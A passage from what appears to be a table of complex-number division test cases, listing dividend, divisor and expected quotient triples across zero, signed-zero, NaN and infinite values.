complex(zero, zero)}, {complex(zero, zero), complex(2, -1), complex(zero, zero)}, {complex(zero, zero), complex(2, 2), complex(zero, zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(nan, zero), complex(nan, nan)}, {complex(zero, zero), complex(nan, -zero), complex(nan, nan)}, {complex(zero, zero), complex(nan, 1), complex(nan, nan)}, {complex(zero, zero), complex(nan, -1), complex(nan, nan)}, {complex(zero, zero), complex(nan, 2), complex(nan, nan)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(inf, zero), complex(zero, zero)}, {complex(zero, zero), complex(inf, -zero), complex(zero, zero)}, {complex(zero, zero), complex(inf, 1), complex(zero, zero)}, {complex(zero, zero), complex(inf, -1), complex(zero, zero)}, {complex(zero, zero), complex(inf, 2), complex(zero, zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(-inf, zero), complex(-zero, -zero)}, {complex(zero, zero), complex(-inf, -zero), complex(-zero, -zero)}, {complex(zero, zero), complex(-inf, 1), complex(-zero, -zero)}, {complex(zero, zero), complex(-inf, -1), complex(-zero, -zero)}, {complex(zero, zero), complex(-inf, 2), complex(-zero, -zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(-zero, -zero), complex(zero, zero), complex(nan, nan)}, {complex(-zero, -zero), complex(zero, -zero), complex(nan, nan)}, {complex(-zero, -zero), complex(zero, 1), complex(-zero, zero)}, {complex(-zero, -zero), complex(zero, -1), complex(-zero, -zero)}, {complex(-zero, -zero), complex(zero, 2), complex(-zero, zero)}, {complex(-zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -zero), complex(zero, zero), complex(nan, nan)}, {complex(-zero, -zero), complex(-zero, -zero), complex(nan, nan)}, {complex(-zero, -zero), complex(zero, 1), complex(-zero, zero)}, {complex(-zero, -zero), complex(-zero, -1), complex(zero, -zero)}, {complex(-zero, -zero), complex(zero, 2), complex(-zero, zero)}, {complex(-zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -zero), complex(1, zero), complex(-zero, zero)}, {complex(-zero, -zero), complex(1, -zero), complex(zero, -zero)}, {complex(-zero, -zero), complex(1, 1), complex(-zero, zero)}, {complex(-zero, -zero), complex(1, -1), complex(zero, -zero)}, {complex(-zero, -zero), complex(1, 2), complex(-zero, zero)}, {complex(-zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -zero), complex(-1, zero), complex(-zero, zero)}, {complex(-zero, -zero), complex(-1, -zero), complex(zero, -zero)}, {complex(-zero, -zero), complex(-1, 1), complex(-zero, zero)}, {complex(-zero, -zero), complex(-1, -1), complex(zero, -zero)}, {complex(-zero, -zero), complex(-1, 2), complex(zero, zero)}, {complex(-zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -zero), complex(2, zero), complex(-zero, zero)}, {complex(-zero, -zero), complex(2, -zero), complex(zero, -zero)}, {complex(-zero, -zero), complex(2, 1), complex(-zero, zero)}, {complex(-zero, -zero), complex(2, -1), complex(zero, -zero)}, {complex(-zero, -zero), complex(2, 2), complex(-zero, zero)}, {complex(-zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -zero), complex(nan, zero), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, -zero), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, 1), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, -1), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, 2), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -zero), complex(inf, zero), complex(-zero, zero)}, {complex(-zero, -zero), complex(inf, -zero), complex(zero, -zero)}, {complex(-zero, -zero), complex(inf, 1), complex(-zero, zero)}, {complex(-zero, -zero), complex(inf, -1), complex(zero, -zero)}, {complex(-zero, -zero), complex(inf, 2), complex(-zero, zero)}, {complex(-zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -zero), complex(-inf, zero), complex(-zero, zero)}, {complex(-zero, -zero), complex(-inf, -zero), complex(zero, -zero)}, {complex(-zero, -zero), complex(-inf, 1), complex(-zero, zero)}, {complex(-zero, -zero), complex(-inf, -1), complex(zero, -zero)}, {complex(-zero, -zero), complex(-inf, 2), complex(-zero, zero)}, {complex(-zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -zero), complex(nan, inf), complex(zero, zero)}, {complex(-zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(zero, 1), complex(zero, zero), complex(nan, inf)}, {complex(zero, 1), complex(zero, -zero), complex(nan, inf)}, {complex(zero, 1), complex(zero, 1), complex(1, zero)}, {complex(zero, 1), complex(zero, -1), complex(-1, zero)}, {complex(zero, 1), complex(zero, 2), complex(0.5, zero)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(zero, zero), complex(nan, inf)}, {complex(zero, 1), complex(-zero, -zero), complex(nan, -inf)}, {complex(zero, 1), complex(zero, 1), complex(1, zero)}, {complex(zero, 1), complex(-zero, -1), complex(-1, -zero)}, {complex(zero, 1), complex(zero, 2), complex(0.5, zero)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(1, zero), complex(zero, 1)}, {complex(zero, 1), complex(1, -zero), complex(zero, 1)}, {complex(zero, 1), complex(1, 1), complex(0.5, 0.5)}, {complex(zero, 1), complex(1, -1), complex(-0.5, 0.5)}, {complex(zero, 1), complex(1, 2), complex(0.4, 0.2)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(-1, zero), complex(-zero, -1)}, {complex(zero, 1), complex(-1, -zero), complex(-zero, -1)}, {complex(zero, 1), complex(-1, 1), complex(0.5, -0.5)}, {complex(zero, 1), complex(-1, -1), complex(-0.5, -0.5)}, {complex(zero, 1), complex(-1, 2), complex(0.4, -0.2)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(2, zero), complex(zero, 0.5)}, {complex(zero, 1), complex(2, -zero), complex(zero, 0.5)}, {complex(zero, 1), complex(2, 1), complex(0.2, 0.4)}, {complex(zero, 1), complex(2, -1), complex(-0.2, 0.4)}, {complex(zero, 1), complex(2, 2), complex(0.25, 0.25)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(nan, zero), complex(nan, nan)}, {complex(zero, 1), complex(nan, -zero), complex(nan, nan)}, {complex(zero, 1), complex(nan, 1), complex(nan, nan)}, {complex(zero, 1), complex(nan, -1), complex(nan, nan)}, {complex(zero, 1), complex(nan, 2), complex(nan, nan)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(inf, zero), complex(zero, zero)}, {complex(zero, 1), complex(inf, -zero), complex(zero, zero)}, {complex(zero, 1), complex(inf, 1), complex(zero, zero)}, {complex(zero, 1), complex(inf, -1), complex(zero, zero)}, {complex(zero, 1), complex(inf, 2), complex(zero, zero)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(-inf, zero), complex(-zero, -zero)}, {complex(zero, 1), complex(-inf, -zero), complex(-zero, -zero)}, {complex(zero, 1), complex(-inf, 1), complex(-zero, -zero)}, {complex(zero, 1), complex(-inf, -1), complex(-zero, -zero)}, {complex(zero, 1), complex(-inf, 2), complex(-zero, -zero)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(-zero, -1), complex(zero, zero), complex(nan, -inf)}, {complex(-zero, -1), complex(zero, -zero), complex(nan, -inf)}, {complex(-zero, -1), complex(zero, 1), complex(-1, zero)}, {complex(-zero, -1), complex(zero, -1), complex(1, -zero)}, {complex(-zero, -1), complex(zero, 2), complex(-0.5, zero)}, {complex(-zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -1), complex(zero, zero), complex(nan, -inf)}, {complex(-zero, -1), complex(-zero, -zero), complex(nan, inf)}, {complex(-zero, -1), complex(zero, 1), complex(-1, zero)}, {complex(-zero, -1), complex(-zero, -1), complex(1, -zero)}, {complex(-zero, -1), complex(zero, 2), complex(-0.5, zero)}, {complex(-zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -1), complex(1, zero), complex(-zero, -1)}, {complex(-zero, -1), complex(1, -zero), complex(zero, -1)}, {complex(-zero, -1), complex(1, 1), complex(-0.5, -0.5)}, {complex(-zero, -1), complex(1, -1), complex(0.5, -0.5)}, {complex(-zero, -1), complex(1, 2), complex(-0.4, -0.2)}, {complex(-zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -1), complex(-1, zero), complex(-zero, 1)}, {complex(-zero, -1), complex(-1, -zero), complex(zero, 1)}, {complex(-zero, -1), complex(-1, 1), complex(-0.5, 0.5)}, {complex(-zero, -1), complex(-1, -1), complex(0.5, 0.5)}, {complex(-zero, -1), complex(-1, 2), complex(-0.4, 0.2)}, {complex(-zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -1), complex(2, zero), complex(-zero, -0.5)}, {complex(-zero, -1), complex(2, -zero), complex(zero, -0.5)}, {complex(-zero, -1), complex(2, 1), complex(-0.2, -0.4)}, {complex(-zero, -1), complex(2, -1), complex(0.2, -0.4)}, {complex(-zero, -1), complex(2, 2), complex(-0.25, -0.25)}, {complex(-zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -1), complex(nan, zero), complex(nan, nan)}, {complex(-zero, -1), complex(nan, -zero), complex(nan, nan)}, {complex(-zero, -1), complex(nan, 1), complex(nan, nan)}, {complex(-zero, -1), complex(nan, -1), complex(nan, nan)}, {complex(-zero, -1), complex(nan, 2), complex(nan, nan)}, {complex(-zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -1), complex(inf, zero), complex(-zero, -zero)}, {complex(-zero, -1), complex(inf, -zero), complex(zero, -zero)}, {complex(-zero, -1), complex(inf, 1), complex(-zero, -zero)}, {complex(-zero, -1), complex(inf, -1), complex(zero, -zero)}, {complex(-zero, -1), complex(inf, 2), complex(-zero, -zero)}, {complex(-zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(-zero, -1), complex(-inf, zero), complex(-zero, zero)}, {complex(-zero, -1), complex(-inf, -zero), complex(zero, zero)}, {complex(-zero, -1), complex(-inf, 1), complex(-zero, zero)}, {complex(-zero, -1), complex(-inf, -1), complex(zero, zero)}, {complex(-zero, -1), complex(-inf, 2), complex(-zero, zero)}, {complex(-zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(-zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(-zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(zero, 2), complex(zero, zero), complex(nan, inf)}, {complex(zero, 2), complex(zero, -zero), complex(nan, inf)}, {complex(zero, 2), complex(zero, 1), complex(2, zero)}, {complex(zero, 2), complex(zero, -1), complex(-2, zero)}, {complex(zero, 2), complex(zero, 2), complex(1, zero)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(zero, zero), complex(nan, inf)}, {complex(zero, 2), complex(-zero, -zero), complex(nan, -inf)}, {complex(zero, 2), complex(zero, 1), complex(2, zero)}, {complex(zero, 2), complex(-zero, -1), complex(-2, -zero)}, {complex(zero, 2), complex(zero, 2), complex(1, zero)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(1, zero), complex(zero, 2)}, {complex(zero, 2), complex(1, -zero), complex(zero, 2)}, {complex(zero, 2), complex(1, 1), complex(1, 1)}, {complex(zero, 2), complex(1, -1), complex(-1, 1)}, {complex(zero, 2), complex(1, 2), complex(0.8, 0.4)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(-1, zero), complex(-zero, -2)}, {complex(zero, 2), complex(-1, -zero), complex(-zero, -2)}, {complex(zero, 2), complex(-1, 1), complex(1, -1)}, {complex(zero, 2), complex(-1, -1), complex(-1, -1)}, {complex(zero, 2), complex(-1, 2), complex(0.8, -0.4)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(2, zero), complex(zero, 1)}, {complex(zero, 2), complex(2, -zero), complex(zero, 1)}, {complex(zero, 2), complex(2, 1), complex(0.4, 0.8)}, {complex(zero, 2), complex(2, -1), complex(-0.4, 0.8)}, {complex(zero, 2), complex(2, 2), complex(0.5, 0.5)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(nan, zero), complex(nan, nan)}, {complex(zero, 2), complex(nan, -zero), complex(nan, nan)}, {complex(zero, 2), complex(nan, 1), complex(nan, nan)}, {complex(zero, 2), complex(nan, -1), complex(nan, nan)}, {complex(zero, 2), complex(nan, 2), complex(nan, nan)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(inf, zero), complex(zero, zero)}, {complex(zero, 2), complex(inf, -zero), complex(zero, zero)}, {complex(zero, 2), complex(inf, 1), complex(zero, zero)}, {complex(zero, 2), complex(inf, -1), complex(zero, zero)}, {complex(zero, 2), complex(inf, 2), complex(zero, zero)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(-inf, zero), complex(-zero, -zero)}, {complex(zero, 2), complex(-inf, -zero), complex(-zero, -zero)}, {complex(zero, 2), complex(-inf, 1), complex(-zero, -zero)}, {complex(zero, 2), complex(-inf, -1), complex(-zero, -zero)}, {complex(zero, 2), complex(-inf, 2), complex(-zero, -zero)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(1, zero), complex(nan, nan)}, {complex(nan, nan), complex(1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(1, 1), complex(nan, nan)}, {complex(nan, nan), complex(1, -1), complex(nan, nan)}, {complex(nan, nan), complex(1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-1, zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, 1), complex(nan, nan)}, {complex(nan, nan), complex(-1, -1), complex(nan, nan)}, {complex(nan, nan), complex(-1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(2, zero), complex(nan, nan)}, {complex(nan, nan), complex(2, -zero), complex(nan, nan)}, {complex(nan, nan), complex(2, 1), complex(nan, nan)}, {complex(nan, nan), complex(2, -1), complex(nan, nan)}, {complex(nan, nan), complex(2, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, -zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, 1), complex(nan, nan)}, {complex(nan, nan), complex(nan, -1), complex(nan, nan)}, {complex(nan, nan), complex(nan, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, -zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(-zero, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(-zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(1, zero), complex(nan, inf)}, {complex(nan, inf), complex(1, -zero), complex(nan, inf)}, {complex(nan, inf), complex(1, 1), complex(inf, inf)}, {complex(nan, inf), complex(1, -1), complex(-inf, inf)}, {complex(nan, inf), complex(1, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-1, zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, 1), complex(inf, -inf)}, {complex(nan, inf), complex(-1, -1), complex(-inf, -inf)}, {complex(nan, inf), complex(-1, 2), complex(inf, -inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(2, zero), complex(nan, inf)}, {complex(nan, inf), complex(2, -zero), complex(nan, inf)}, {complex(nan, inf), complex(2, 1), complex(inf, inf)}, {complex(nan, inf), complex(2, -1), complex(-inf, inf)}, {complex(nan, inf), complex(2, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(-zero, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(-zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(1, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(1, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(1, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-1, zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, 1), complex(-inf, inf)}, {complex(nan, -inf), complex(-1, -1), complex(inf, inf)}, {complex(nan, -inf), complex(-1, 2), complex(-inf, inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(2, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(2, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(2, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(1, zero), complex(zero, zero), complex(inf, nan)}, {complex(1, zero), complex(zero, -zero), complex(inf, nan)}, {complex(1, zero), 